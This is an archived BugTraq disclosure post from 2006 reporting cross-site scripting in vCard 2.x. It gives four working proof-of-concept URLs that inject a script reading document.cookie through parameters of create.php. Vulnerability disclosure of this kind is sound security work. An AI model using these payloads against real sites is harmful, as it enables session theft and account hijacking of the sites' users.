BugTraq
XSS in vCard Mar 11 2006 06:20PM
xx_hack_xx_2004 hotmail com
Hello
Vulnerable: vCard 2.x

http://www.belchiorfoundry.com

Exploit :
http://example.com/vcard/create.php?card_id='><script>alert(document.coo
kie)</script>

http://example.com/vcard/create.php?uploaded='><script>alert(document.co
okie)</script>

http://example.com/vcard/create.php?card_fontsize='><script>alert(docume
nt.cookie)</script>

http://example.com/vcard/create.php?card_color='><script>alert(document.
cookie)</script>

Discovery by Linux_Drox

http://www.lezr.com

Best Regards

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus